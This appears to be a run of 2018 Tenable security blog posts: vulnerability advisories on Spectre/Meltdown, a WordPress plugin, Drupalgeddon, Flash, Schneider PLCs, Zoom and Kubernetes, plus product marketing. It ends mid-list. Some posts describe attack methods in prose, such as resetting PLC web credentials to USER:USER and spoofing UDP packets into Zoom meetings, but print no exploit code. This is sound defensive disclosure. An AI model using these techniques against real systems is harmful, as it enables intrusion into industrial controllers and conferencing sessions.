<p>While academic papers dating back to 1985 have covered theoretical attacks on CPU caches and translation lookaside buffers (TLBs), <a href="https://bugzilla.redhat.com/show_bug.cgi?id=1519780#c0">rumors</a> about the existence of vulnerabilities in the wild that leveraged Speculative Execution began surfacing in late 2017. However, the real saga began publicly on January 3, 2018 when a blog post from <a href="https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory...’s Project Zero Initiative</a> detailed their findings. <a href="https://www.tenable.com/blog/the-first-major-security-logos-of-2018-spec...">Spectre and Meltdown were unleashed to the public</a> just as people were coming back from their New Year holiday. The reports included three variants of the vulnerabilities: CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2) for <a href="https://spectreattack.com/spectre.pdf">Spectre</a> and CVE-2017-5754 (Variant 3) for <a href="https://meltdownattack.com/meltdown.pdf">Meltdown</a>. </p>
<p>This mega-event sparked a huge discussion in the community for various reasons: the impact of the vulnerabilities themselves; the number of vendors affected directly and indirectly at various levels of the supply chain; the sheer number of systems impacted worldwide; and the mammoth task of getting these systems updated (if at all possible). Clearly, Pandora’s box had been opened and there was no going back. Pundits predicted (accurately!) we would see more of these in the months and years to come. </p>
<p>In late May 2018, two more vulnerabilities were discovered and reported by <a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-s... and Google</a>. These were tagged Variant 3A (CVE-2018-3640) and Variant 4 (CVE-2018-3639). The <a href="https://www.tenable.com/blog/spectre-and-meltdown-still-haunting-intelamd">fourth variant</a> presented a new method for leaking information from a system and could be exploited from a browser, thereby enhancing the ease of exploitation. These variants are part of eight additional Spectre-class flaws provisionally named Spectre-NG. </p>
<p>Soon to follow were other flaws from the Spectre-NG class: Lazy FP State Restore (CVE-2018-3665); Bounds Check Bypass Store (BCBS) aka Spectre 1.1 (CVE-2018-3693); Spectre 1.2; ret2spec (aka Spectre v5); and SpectreRSB (Return Stack Buffer).</p>
<p>In July 2018, <a href="https://mlq.me/download/netspectre.pdf">NetSpectre</a> surfaced and changed the scope in terms of exploitability of the Spectre family: a remote attack was now possible. By virtue of this new vulnerability, reported by researchers of the Graz University of Technology, an exposed Network Interface or API would be enough for an attacker to execute the remote side-channel attack. NetSpectre is capable of leaking information from the target system and even though the rate of transmission is low (around 15 to 60 bits per hour in a local network) it is still proof that novel variations of speculative execution can target a broad range of devices.</p>
<p>Most recently, on August 14, a new set of vulnerabilities dubbed <a href="https://foreshadowattack.eu/">Foreshadow</a> and Foreshadow-NG were made public. The new set of vulnerabilities exploiting a <a href="https://www.tenable.com/blog/foreshadow-speculative-execution-attack-tar... attack causing a L1 Terminal Fault</a> could affect processors, Virtual Machines and Cloud environments. These vulnerabilities can be triggered when accessing a linear or logical address that is not mapped to a physical location on the hardware resulting in a Terminal Fault. </p>
<h2>So what difference does it make?</h2>
<p>Spectre and Meltdown opened a broad discussion in regards to the current state of security and their implications. With the remarkably large number of systems vulnerable to speculative execution attacks, and the closing gap between Proofs of Concepts and <a href="https://blog.malwarebytes.com/security-world/2018/01/meltdown-and-spectr..., it’s imperative for security teams and companies collaborate to keep an eye on and be aware of the evolution of these threats.</p>
<p>Speculative Execution vulnerabilities not only affect microprocessor manufacturers, but the whole security community. Some of the discovered vulnerabilities will not be fully patched until new architectures are developed and deployed, which will take a few years to happen. More vulnerabilities will be discovered in the upcoming months and years expanding on the current attack vectors. </p>
<h2>Why is this important?</h2>
<ul><li>The Spectre and Meltdown vulnerabilities affect a very large number and wide range of devices, including computers, mobile devices and servers. Given the widespread nature, it is certain all affected systems will never be actually patched. </li>
<li>These classes of vulnerabilities are not going away anytime soon. While some of these vulnerabilities have been mitigated by software patches provided by different vendors, this has come at the cost of performance, and, in some cases, holistic fixes have required architectural changes.</li>
<li>New, but related vulnerabilities will be discovered, unveiling novel types of attacks that might not be possible to patch via software alone.</li></ul>
<h2>What you can do…</h2>
<p>Keeping up to date with information on new vulnerabilities and mitigating them via software patches or microcode provides a first line of defense. </p>
<p>Knowing how you are exposed can help to manage and mitigate risks associated with vulnerabilities. By visualizing, analyzing and measuring cyber risk, one can confidently manage and reduce it to an acceptable level. </p>
<p>Security teams must become proactive to close the gap between the publication of a new vulnerability and becoming aware that it is present in their ecosystem. As per <a href="https://www.tenable.com/cyber-exposure/attackers-advantage">Tenable Research’s report</a> on the Attacker’s Advantage, 34% of the analyzed vulnerabilities had an exploit available on the day they were disclosed. Teams willing to protect their organization’s infrastructure can be a step ahead of the curve and reduce the seveday window of opportunity attackers have to exploit a given vulnerability. </p>
<p>On our part, we will keep you updated on the saga of speculative side channel vulnerabilities as things evolve. Stay tuned! </p>
<h2>Learn more:</h2>
<ul><li><a href="https://www.darkreading.com/attacks-breaches/new-side-channel-attacks-ta... Side-Channel Attacks Target Graphics Processing Units</a></li>
<li><a href="https://www.zdnet.com/article/intel-cpus-impacted-by-new-portsmash-side-... CPUs impacted by new PortSmash side-channel vulnerability</a></li></ul>
<p><b><i>Learn more about <a href="https://www.tenable.com/products">Tenable</a>, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a <a href="https://www.tenable.com/products/tenable-io/vulnerability-management/eva... 60-day trial</a> of Tenable.io Vulnerability Management. </i></b></p>

The ‘AMP for WP – Accelerated Mobile Pages’ plugin for WordPress is vulnerable to a privilege escalation attack. Updating the plugin to version ‘0.9.97.20’ fixes the flaw.

Background

Following the discovery of a critical vulnerability in the WP GDPR Compliance Plugin, another critical WordPress plugin vulnerability was discovered this week in the popular AMP for WP plugin by researchers at WebARX Security. The plugin adds support for Google Accelerated Mobile Pages (AMP), a mobile site acceleration tool, to any WordPress site that has it installed.

Older versions of the plugin are vulnerable to a privilege escalation flaw, which allows WordPress site users of any level to make administrative API calls.

Analysis

WordPress allows all users to make AJAX API calls to manage or invoke various functions they may need to manage their site. However, the older version of this plugin didn’t include a wpnonce check to verify account permissions of the currently logged in user, effectively opening admin API access to anyone with a login for a site.

Admin access for WordPress allows for ad placement, custom HTML, and manual WordPress plugin uploads. From an outsider attack perspective, basic or even guest users are now a potential vector for admin access.

Proof of Concept

Source: WebARX Security

Solution

An updated version of the plugin is available via automatic updates through WordPress. Users can also manually download the plugin update here.

Identifying affected systems

Plugin 101841 will detect any WordPress plugins that are out of date, which includes the AMP for WP plugin, but doesn’t reflect the criticality of this specific issue.

A list of Tenable plugins to identify this vulnerability will appear here as they’re released.

Get more information

• WebARX Security Blog
• AMP for WP Plugin Page

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

<p>Identifying your risk posture should be the first objective of all cybersecurity programs. Yet, this is where organizations often fail, due to weak visibility and understanding during the crucial “identify” phase of the cybersecurity lifecycle. Focusing on protect, detect, respond, recover without an understanding of risk posture leads to failed security strategies.</p>

<p>The cybersecurity defense lifecycle has a <a href="https://www.nist.gov/sites/default/files/documents/2017/12/05/draft-2_fr... Framework</a> created for the purpose of helping organizations reduce and better manage cyber risks. It depicts the phases of a continuous lifecycle on a continuum like so: identify->protect->detect->respond->recover (Figure 1).</p>

<img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/Shift%20Left%20in%20the%20NIST%20framework.png" width="975" height="138" alt="The NIST Cybersecurity Framework depicts the phases of a continuous lifecycle on a continuum like so: identify-protect-detect-respond-recover." />
<p></i>Figure 1: NIST Cybersecurity Framework.</i></p>

<p>The cyber defense industry has had a huge focus in recent years on innovations relevant to the protect, detect and respond/recover aspects of this lifecycle. The <a href="https://momentumcyber.com/docs/CYBERscape.pdf">cybersecurity landscape</a> has been exploding with several hundreds of vendors (~500) in an ever-increasing number of areas and specializations. How do you know whether you need every one of these tools in your toolbox or just a couple? </p>

<p>It all starts with the “identify” stage, which begins with an initial understanding of your own risk posture that then develops into a more comprehensive risk management strategy with a focus on reducing your cyber exposure. This beginning allows for a measured response, rather than a spray-and-pray approach that is unlikely to yield the results you're looking for. Understanding your own risk posture requires getting a continuously updated picture of your assets and information about the importance of those assets, and with a picture of the attack surface exposed by those assets directly or indirectly. Combining this level of insight with the risk introduced by humans -- whether inside or outside your organization -- gives you a much better picture of risk.</p>

<p>In the past, identification of assets was a relatively uncomplicated problem to solve. Your assets were physical assets that you knew, you could touch and, for the most part, they never left the building. As you move from that world into the world of BYOD, IoT, virtual machines, public cloud, containers and now serverless computing, those assets can be increasingly ephemeral and hard to discover and control. Furthermore, there’s been a significant increase in the sheer number of vulnerabilities over the past several years, with last year exhibiting a significant spike and this year on target to come close to or even exceed last year (Figure 2). The ever-changing elastic attack surface created by the evolution of assets from physical to increasingly ephemeral has created a massive gap in an organization’s ability to truly understand its Cyber Exposure at any given time. We call this the <a href="https://www.tenable.com/cyber-exposure">Cyber Exposure gap</a>.</p>

<img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/vulnerability%20distribution%20trends%20over%20time.png" width="975" height="371" alt="Vulnerability distribution trends over time (Source: NVD)" />
<p><i>Figure 2: Vulnerability distribution trends over time (Source: NVD).</i></p>

<p>Recent high-profile breaches like Equifax, which was identified as being due to not patching an Apache Struts vulnerability for months, has led to significant focus on accelerating the time it takes to fix vulnerabilities across the corporate landscape. </p>

<p>This isn’t and hasn’t been an easy problem to solve for most organizations. The complexity of dealing with the vulnerabilities found in an organization has been increasing multiplicatively as a result of the sheer number of vulnerabilities across an ever-changing and expanding asset landscape. This is further complicated by having to consider the effect of a large variety of security products that could mitigate a vulnerability under specific circumstances and configurations. Last, but not least, is the fact that the process of fixing these vulnerabilities now also spans a variety of human owners and operators due to the varied nature of assets today.</p>

<p>In addition to the effort required to understand the current cyber exposure of an organization, future technology adoption decisions are also facing security considerations such as:</p>
<ul><li>Will adopting technology X increase risk and how do we mitigate it?</li>
<li>How do I keep a view of my ever-changing cyber risk posture so that I always know where to pay attention?</li>
<li>How do I become more proactive in closing the cyber exposure gap?</li></ul>

<h2>So, where should we start?</h2>

<p>The weakest spots in an organization’s security posture occur at the intersection of attack surface, avenues of attack (attack vectors) and obstacles/ (lack of) controls in place. Identifying these weak spots should be the first objective of all cybersecurity programs. This is also where several fail, due to weak visibility and understanding during that crucial “identify” phase. </p>

<img src="/sites/drupal.dmz.tenablesecurity.com/files/images/blog/Cybersecurity%20finding%20the%20weak%20link.png" width="975" height="404" alt="The weakest spots in an organization’s security posture occur at the intersection of attack surface, avenues of attack (attack vectors) and obstacles/ (lack of) controls in place." />

<p>As a practice, we would all be better off with shifting further left in the lifecycle to address the right problems with the right solutions. That said, it isn’t enough to merely shift left at the start of your program for better cyber hygiene, it has to be an active part of your program, where it is revisited and continuously assessed.</p>

<p><b><i>Where are the top vulnerabilities found in the enterprise? Read the <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">Vulne... Intelligence Report</a> from Tenable Research to find out.</i></b></p>

Recent attacks targeting Drupal instances vulnerable to Drupalgeddon 2 and Drupalgeddon 3 highlight the importance of identifying and patching vulnerable sites.

Background

In March 2018, Drupal published a security advisory, SA-CORE-2018-002 that addressed a critical Remote Code Execution (RCE) vulnerability with a CVE identifier of CVE-2018-7600. Tenable’s Security Response Team published a blog as well.

A few weeks after the publication of this security advisory, researchers at Check Point Software Technologies and Dofinity published “Uncovering Drupalgeddon 2.0,” providing technical details about CVE-2018-7600. The report included enough information that proof-of-concept (PoC) code began to appear on Github.

One month later, Drupal released SA-CORE-2018-004, a security advisory addressing CVE-2018-7602, another RCE vulnerability which became known as Drupalgeddon 3.

After PoC code for Drupalgeddon was released, attackers began leveraging these vulnerabilities in the wild to implant cryptomining scripts on websites (known as “cryptojacking”) as well as deliver backdoors and password stealing and Remote Access Trojan (RAT) malware.

Despite the availability of patches for both Drupalgeddon 2 and Drupalgeddon 3, there are still unpatched Drupal instances which are being targeted by cybercriminals.

Incident details

On November 19, Trustwave and Imperva published two separate blogs detailing recent attacks leveraging the Drupalgeddon 2 vulnerability.

Trustwave blogged about the discovery of a cryptomining script found on the Make-A-Wish international website which was linked to a known Drupalgeddon 2 campaign dating back to May 2018.

Imperva blogged about a campaign from the end of October that leveraged Drupalgeddon 2 and the Dirty COW (CVE-2016-5195) vulnerability to compromise systems in a persistent manner.

Both of these stories highlight ongoing efforts by cybercriminals to identify and target vulnerable Drupal instances and maintain persistence on compromised systems.

Urgently required actions

It is extremely important to identify Drupal instances that remain unpatched and apply the available patches for SA-CORE-2018-002 and SA-CORE-2018-004 immediately.

Identifying affected systems

A list of Nessus plugins to identify assets vulnerable to Drupalgeddon can be found here.

Get more information

• Drupal core - SA-CORE-2018-002
• Drupal core - SA-CORE-2018-004
• Critical Drupal Core Vulnerability: What You Need to Know
• Uncovering Drupalgeddon 2
• Hacker's Wish Come True After Infecting Visitors of Make-A-Wish Website With Cryptojacking
• DirtyCOW Bug Drives Attackers to A Backdoor in Vulnerable Drupal Web Servers
• Large cryptojacking campaign targeting vulnerable Drupal websites
• Tweet from GreyNoise Intelligence
• A look into Drupalgeddon’s client-side attacks

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Adobe has released an out-of-band patch for a critical Flash Player vulnerability. Users are encouraged to upgrade as soon as possible.

Background

On November 20, Adobe released APSB18-44, an out-of-band (OOB) security bulletin to address a zero day vulnerability in Adobe Flash Player versions 31.0.0.148 and earlier for Windows, macOS, Linux and Chrome OS.

This bulletin arrived seven days after Adobe released APSB18-39, it’s monthly security bulletin for November 2018. On the very same day, November 13, researcher Gil Dabah published a blog discussing his discovery of CVE-2018-15981.

It may not seem like a coincidence that both Adobe’s monthly security bulletin and the researcher’s blog were published on the same day. However, Dabah indicated it may just have been a coincidence after all in a tweet:

Kudos to @AdobeSecurity for touching base and working on a fix already.

— Gil Dabah (@_arkon) November 14, 2018

Vulnerability details

In his blog, Dabah shares details about CVE-2018-15981, a type confusion vulnerability in Adobe Flash Player. Specifically, the vulnerability exists in the interpreter code for Adobe’s ActionScript Virtual Machine (AVM). According to Dabah, the AVM’s interpreter “does not reset a with-scope pointer when an exception is caught” which leads to the type confusion and “eventually to a remote code execution.”

User interaction is required to exploit this vulnerability. An attacker would need to convince users to visit a malicious website, compromise a website or advertising network and inject malicious code.

For further technical details about the vulnerability, please visit Dabah’s blog.

Urgently required actions

Upgrade to the latest version of Flash Player for your respective operating system or web browser. Adobe has provided links in the solution section of their security bulletin.

If Adobe Flash is not a requirement in your network or on your devices, you may consider disabling it altogether.

Identifying affected systems

A list of Nessus plugins to identify this vulnerability will appear here as they’re released.

Get more information

• Security updates available for Flash Player | APSB18-44
• Flash News (Gil Dabah's blog)
• ADV180030 | November 20, 2018 Flash Updates

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Tenable Research discovered multiple vulnerabilities in Schneider’s Modicon Quantum programmable logic controller. Schneider has recommended mitigations for impacted end users.

Background

While examining a Schneider Modicon Quantum programmable logic controller (PLC) Tenable Research discovered several vulnerabilities.

The Modicon Quantum is used for complex process control, safety and infrastructure in industrial settings like manufacturing. Industrial control systems typically include a computer called a programmable logic controller (PLC). PLCs connect directly to instruments, for example valve and pump actuators and motors, that perform industrial processes. They communicate with other PLCs and supervisory control and data acquisition (SCADA) devices, and often connect to operator interfaces, whether local or remote via network communications.

PLCs provide automated functions to manage aspects such as pressure, flow, temperature, motion control and other process variables. They have replaced traditional analogue controls, historically based on mechanical, pneumatic or electronic components, with digital programmable software.

The vulnerabilities we discovered include unauthenticated remote flaws that permit a malicious attacker to delete legitimate accounts, and change the password for the admin account. A threat actor can gain full administrator access.

Analysis

Our research focused on the Schneider Modicon Quantum PLC with a 140 NOC77101 Ethernet communication module.

The first two vulnerabilities that we discovered permit an unauthenticated attacker to manipulate user accounts via the built-in web server in the PLC. An attacker can change any user's passwords, including the administrator password (CVE-2018-7811). It is also possible to delete the existing admin username and password (CVE-2018-7809) for the web interface, in the process resetting the web server username and password to USER:USER.

We also discovered two web application vulnerabilities that permit cross-site scripting attacks. In a cross-site scripting (XSS) attack, malicious code is injected into otherwise benign and trusted websites or URLs.The attacker uses the web application to send malicious code, usually in the form of a browser side script, to a different end user. One of the vulnerabilities is a reflected cross-site scripting flaw (CVE-2018-7810). An attacker can insert Javascript into the "name" parameter that will then be executed by the client clicking on the crafted link.

The second web application vulnerability is a cross-site request forgery (CSRF) flaw (CVE-2018-7831). An attacker can forge a link to be sent to an authenticated victim. Once clicked, the victim’s password will be changed to a password chosen by the attacker.

Lastly, we also discovered two denial-of-service (DoS) vulnerabilities. One of the DoS vulnerabilities can be triggered by sending a crafted request to the web server and will render the web server inaccessible for around one minute (CVE-2018-7830). The other DoS vulnerability impacts a Schneider Modbus function, and can be used to completely shut down the communication module.

You can find further technical details in the Advisory.

Business impact

Organizations using these devices in ICS and SCADA environments have two key priorities: securing health, safety and the environment and protecting the business processes that matter most. These priorities may pull against one another when it comes to vulnerabilities in hardware like a PLC. These devices provide critical control functionality and cannot be taken offline to be patched, in the event any patch is provided.

Organizations must have visibility into their OT assets and put strong controlling measures in place to mitigate risk. The lifespans of these devices are measured in decades and, because of increasing cost pressures, those lifespans are being stretched even further. This means organizations may have vulnerable devices in sensitive environments for extended periods of time. Visibility and mitigation have to be a top priority.

Solution

Schneider has issued a Security Notification for these vulnerabilities. Because the Quantum product line is end of life, software updates will not be released. Schneider has provided a set of recommendations, including standard mitigations, to protect impacted end users from these vulnerabilities. These mitigations are outlined in the Security Notification and include:

• Disable the web server by default
• Configure access control lists to restrict web server access to authorized IP addresses
• Protect access to Modicon products with network, industrial, and application firewalls

Identifying affected systems

The products affected include all Modicon M340, Premium, Quantum PLCs and BMXNOR0200. Tenable has released a Nessus plugin to detect CVE-2018-7831, which can be found here.

Additional information

• Schneider Security Notification
• Tenable Research Advisory

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

<p>How the CDM DEFEND plan for adding and securing mobile devices will help government agencies improve visibility and security.</p>
<p>“<a href="https://www.youtube.com/watch?v=ToxymSLzJeM">Going Mobile</a>” was a hit song for the British rock band “The Who” in the early 1970s. Celebrating a transient lifestyle, the song captured the public’s imagination because, at the time, society was generally immobile; people were tied to single towns, jobs, and friends and family who rarely ventured far from home.</p>
<p>Fast forward to 2018 and mobility has become the norm. “Telecommuting,” remote work and frequent travel are all part of our daily routines. This mobility brings unique security challenges because we are never traveling alone – we want all of our devices with us and require instant access to the applications we can’t live without.</p>
<p>The Department of Homeland Security (DHS) <a href="https://www.dhs.gov/cdm">Continuous Diagnostics & Mitigation (CDM) Program Office</a>, which is responsible for securing the entire Federal enterprise, has had concerns about the mobile challenge for some time. Now that five of six CDM DEFEND task orders have been awarded (the sixth, Group F, is expected in 2019), the program can focus more on mobility. The DEFEND task orders require awardees to improve visibility and security in the mobile environment. </p>
<p>The <a href="https://www.meritalk.com/articles/cdm-defend-mobile-rfs/">CDM DEFEND plan for adding and securing mobile devices</a> is to develop a partnership approach. In order to meet current standards, Federal agencies have been deploying enterprise mobile solutions, or Mobile Device Management (MDM) platforms. Although it is not the answer to all mobile device security concerns, MDM represents a significant enhancement to mobile device security.</p>
<h2>The CDM DEFEND mobile device management process</h2>
<p>The CDM Program Office envisions the awardees first ensuring their MDM meets or exceeds CDM-compliant security benchmarks. Once that is accomplished, DHS, through the CDM DEFEND Request for Service (RFS) process, will partner to integrate Federal agency mobile security solutions into the overall CDM scheme. The MDM data will eventually flow up to the CDM Agency Dashboard, providing a more complete picture of the agency’s security posture by including the ever-growing number of mobile devices.</p>
<p>More than any other technology area, the mobile security challenge is complicated by the ways different agencies handle mobile. Some agencies standardize on a single platform, while others offer different handset and connection options to meet the needs of their various component sub-agencies. </p>
<p>“Bring Your Own Device” (BYOD) introduces challenges of non-standard hardware, operating systems and applications. Without vigilant security solutions in place, mobility increases the attack surface, widening the Cyber Exposure gap of the entire agency enterprise. The overarching goal of the DHS CDM Program Office is to overcome security challenges of the federal enterprise. By adding visibility to the hardware, software, configuration and vulnerabilities of mobile assets, these four areas in the original CDM program will increase cybersecurity across the Federal spectrum. The CDM PMO plans to accomplish this in a step-by-step, programmatic fashion:</p>
<ul><li>Complete assessments of agency mobile device management practices</li>
<li>Produce analyses based on best practices and standards in use among federal agencies</li>
<li>Perform gap analyses and driving to close critical gaps</li>
<li>Normalize the cybersecurity data from mobile assets to be incorporated with the rest of CDM data bound for the Dashboards</li>
<li>Add processes to the CDM program reviews, ensuring systems remain current and effective</li></ul>
<p>Will CDM affect the effectiveness of mobility solutions? Possibly, depending on the security solutions the agency chooses. Tenable’s SecurityCenter Continuous View (SC CV) enterprise platform develops vulnerability assessments based on the information in the MDM platform; not directly connecting to the mobile device. Other CDM tools may use MDM data or require agents on the mobile device itself. Tenable took this approach to limit any effect on the device, the enterprise and the user. By leveraging the robust capabilities of their already-installed Tenable SC CV platform, agencies can add “goin’ mobile” to their list of successful CDM efforts.
<p><b><i>To learn more about how Tenable, and its flagship CDM platform Tenable.sc Continuous View, can help your Agency improve its security posture, please visit us at: <a href="https://www.tenable.com/data-sheets/maximize-outcomes-for-cdm-and-much-m...

<p>On November 7, 2018, Tenable SecurityCenter was renamed Tenable.sc. Read on to learn more about why we did it - and catch up on the latest innovations coming to our Cyber Exposure platform.</p>

<p>Earlier this month, when we announced new <a href="https://www.tenable.com/press-releases/tenable-announces-industry-s-firs... Prioritization capabilities</a> coming to the Tenable Cyber Exposure platform, we decided it was also time to give one of our key products a fresh name. As of Nov. 7, 2018, Tenable SecurityCenter was renamed Tenable.sc to better reflect its position as a core element of the Tenable Cyber Exposure platform.</p>

<h2>Redefining SecurityCenter</h2>

<p>For most businesses, the number of vulnerabilities they’re dealing with is simply untenable. In fact, the recent <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">Vulne... Intelligence Report</a> from Tenable Research reveals a 53% increase in vulnerabilities published in 2017 compared with the previous year. Combine this rapidly changing and expanding threat landscape with a huge increase in the amount and types of assets on your network, and it’s clear the risk of business-disrupting events has never been higher. </p>

<p>To keep up with the current volume of vulnerabilities, new assets and changes to the threat landscape, organizations need a solution to holistically assess, manage and measure cyber risk across their modern attack surface. Organizations need <a href="https://www.tenable.com/cyber-exposure">Cyber Exposure</a>. </p>

<p>And that’s why we’re excited to bring Tenable.sc into our <a href="https://www.tenable.com/cyber-exposure/platform">Cyber Exposure platform</a>. This change gives customers flexible deployment options for managing vulnerabilities in their modern organization. They may now choose between Tenable.sc (managed on-prem) or Tenable.io (managed in the Cloud). </p>

<p>So what does this mean for Tenable.sc?</p>

<h2>Innovating Tenable.sc</h2>

<p>Tenable.sc, a key part of our portfolio since its inception in 2003, has continually driven innovation in the vulnerability management market. Now, as a core element of the Tenable Cyber Exposure platform, you will see the solution receive increased innovation and accelerated development to help our customers see more, do more and further reduce their cyber risk. </p>

<h2>Available now</h2>

<p>Last week, we released Tenable.sc 5.8. This release enables our customers to see more, extending beyond the walls of the organization for greater support in an on-prem environment. It includes enhancements to <a href="https://www.tenable.com/blog/securitycenter-innovation-continues-with-5-... Agent Workforce</a> capabilities, such as the ability to:</p>
<ul><li>Speed up DNS calls with the ability to resolve DNS assets in parallel</li>
<li>Modify the severity of vulnerabilities with accept/recast rules for agenta data</li>
<li>Get greater flexibility over agent data with option to set a timeline for expiration of agent repositories</li>
<li>Easily retain user data with ability to reassign objects for users deleted by admins</li>
<li>Save time with ability to set a date threshold to import data for agent scans</li>
<li>See key information at a glance with the addition of the scan ID in the component title of PDF reports</li></ul>

<p>For additional information on Tenable.sc 5.8 features and quality fixes check out the <a href="https://docs.tenable.com/releasenotes/securitycenter/securitycenter580.h... notes</a>.</p>

<h2>Coming in 2019</h2>
<p>As we move into the new year, you’ll see significant innovations in Tenable.sc, including:
<ul><li>Integrating SAML to allow for multiple SSO/ authentication solutions, such as Shibboleth.</li>
<li>Integration between Tenable.sc and Industrial Security to deliver high-level analysis and reporting of both OT and IT networks found in critical infrastructure. This gives customers a single platform to measure and manage cyber risk across both OT and IT networks.</li>
<li>Advanced <a href="https://www.tenable.com/press-releases/tenable-announces-industry-s-firs... Prioritization</a> capabilities to address the deluge of vulnerabilities and predict which ones will generate the most cyber risk to organizations. Predictive prioritization will provide organizations with the unprecedented capability to reduce the number of critical vulnerabilities they need to remediate by 95%, while maintaining the same level of cyber risk across their attack surface compared to basic prioritization with CVSS. </li>
<li>Integration with <a href="https://www.tenable.com/products/tenable-io/lumin#form">Tenable Lumin</a> for advanced visualization, analytics and measurements to help organization understand and reduce their Cyber Exposure.</li>
<li>Enhancements and additions to reports and dashboards</li></ul>

<p>So, to answer my original question, what’s in a name? As it turns out, a lot. </p>

<p>We’re excited to bring these innovations to market and bring all our customers along in our Cyber Exposure journey. </p>

<p>Want to learn more about Tenable.sc? Visit the webpage <a href="https://www.tenable.com/products/tenable-sc">https://www.tenable.com/pro...

Tenable Researcher David Wells discovered a vulnerability in Zoom’s Desktop Conferencing Application that allows an attacker to hijack screen controls, spoof chat messages or kick and lock attendees out of meetings. Zoom has released updates for macOS and Windows.

• What you need to know: Tenable Research has discovered a vulnerability in Zoom’s Desktop Conferencing Application.

• What’s the attack vector? Unauthorized command execution via Zoom’s Event messaging pump.

• What’s the business impact? Attackers could hijack control of presenters’ desktops, spoof chat messages and kick attendees out of Zoom calls.

• What’s the solution? Zoom has released an update for the Desktop Conferencing Application.

Background

Tenable has discovered a vulnerability, CVE-2018-15715, in Zoom's Desktop Conferencing Application that allows for execution of unauthorized Zoom commands like spoofing chat messages, hijacking screen controls and kicking attendees off calls and locking them out of meetings. This vulnerability could be exploited in a few scenarios: 1) a Zoom meeting attendee could go rogue; 2) an attacker on the local access network (LAN) or 3) a remote attacker over wide area network (WAN) could theoretically use this vulnerability to hijack an ongoing Zoom meeting. We weren’t able to completely test scenario three, which is more complicated and will be discussed in detail later.

Analysis

This bug is due to the fact that Zoom's internal messaging pump (util.dll!ssb::events_t::loop) dispatches both client User Datagram Protocol (UDP) and server Transmission Control Protocol (TCP) messages (from util.dll!ssb::select_t::loop) to the same message handler in ssb_sdk.dll. This allows an attacker to craft and send UDP packets which get interpreted as messages processed from the trusted TCP channel used by authorized Zoom servers.

This attack not only can be carried out by attendees of the Zoom meeting, but any remote attacker that is able to craft a spoofed UDP packet, as they can then seamlessly slip into the existing UDP session for an ongoing Zoom meeting and trigger this bug. This impacts both one-on-one (P2P) meetings as well as group meetings streamed through Zoom servers. It’s also worth mentioning that an attacker could theoretically exploit this vulnerability over WAN if they have the ability to spoof a public IP source in a UDP packet. In this scenario, the remote attacker could exploit this vulnerability by spoofing the WAN IP and trivially brute force the source port the victim is using for the UDP session with the Zoom server while the meeting is live.

This vulnerability allows an attacker (over LAN or WAN) or rogue attendee to:

1. Hijack screen controls: Bypassing screen control permissions during remote attendee screen share and sending keystrokes and mouse movements to completely control desktop.
2. Spoof chat messages: Sending chat messages impersonating other users on conference.
3. Kick attendees off the conference: Kicking and locking out attendees even while not meeting host.

By exploiting this vulnerability, an attacker could not only hijack the presenter’s screen and open the calculator (as shown in the video linked below), but also could download and execute malware. The practical execution of such an attack would have to overcome UDP packet loss (losing keystroke packets) and interruption of keystroke sequence by the victim.

Proof of concept

Wells has developed a proof of concept (PoC) for this vulnerability. In the video PoC below, you can see a rogue meeting attendee sending UDP packets to forcibly take control of the presenter’s screen and open the calculator.

Business impact

Conferencing services like Zoom are becoming ubiquitous in enterprises as teams are distributed around the world. According to Zoom’s website, over 750,000 companies use the enterprise video communication platform. Exploitation of a vulnerability like this could be extremely disruptive and poses serious reputational risk.

Solution

Zoom patched its servers to block part of the attack vector and released version 4.1.34814.1119 to fix the vulnerability in Windows and version 4.1.34801.1116 for macOS. The latest update for the Linux client doesn’t fix the issue and Zoom is reportedly working on an update.

Identifying affected systems

We have verified this vulnerability affects the following Zoom versions:

• macOS 10.13, Zoom 4.1.33259.0925
• Windows 10, Zoom 4.1.33259.0925
• Ubuntu 14.04 - Zoom 2.4.129780.0915

Tenable has released a Nessus plugin to identify vulnerable systems, which can be found here for Windows and here for macOS.

Additional information

• Zoom Release Notes
• Tenable Research Advisory

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

<p>Patches are available for a critical privilege escalation flaw (CVE-2018-1002105) in the open-source container orchestration system, Kubernetes.</p>

<h2>Background</h2>
<p>On December 3, details about a privilege escalation vulnerability in Kubernetes, the popular open source container orchestration system, <a href="https://github.com/kubernetes/kubernetes/issues/71411">were publicly disclosed by the Kubernetes team</a>. Kubernetes is used to automate the deployment, scaling, and management of containerized applications.</p>

<h2>Vulnerability details</h2>
<p>Designated as CVE-2018-1002105, the vulnerability exists in the proxy handling function of the Kubernetes API server. Arbitrary requests can be made to the backend server via the Kubernetes API server if the requestor is permitted to establish a connection to the API server. According to the Kubernetes team, “all users (authenticated and unauthenticated) are allowed to perform discovery API calls that allow this escalation” through the default configuration.</p>

<p>Additionally, this vulnerability allows for the escalation of Kubernetes pod API requests (exec, attach, portforward) through the kubelet API.</p>

<p>The Kubernetes team notes that, due to the fact that “unauthorized requests are made over an established connection,” the requests won’t appear in the audit or server logs. However, the requests appearing in either the kubelet or aggregated API server logs will be “indistinguishable from correctly authorized and proxied requests via the Kubernetes API server,” making it difficult to detect the use of this vulnerability in your environment.</p>

<h2>Urgently required actions</h2>
<p>System administrators, users or anyone deploying Kubernetes should upgrade to the patched versions immediately. The following versions of Kubernetes are affected by this vulnerability:</p>

<ul><li>Kubernetes v1.0.x-1.9.x</li>
<li>Kubernetes v1.10.0-1.10.10</li>
<li>Kubernetes v1.11.0-1.11.4</li>
<li>Kubernetes v1.12.0-1.12.2</li></ul>

<p>The vulnerability is addressed in the following versions of Kubernetes:</p>

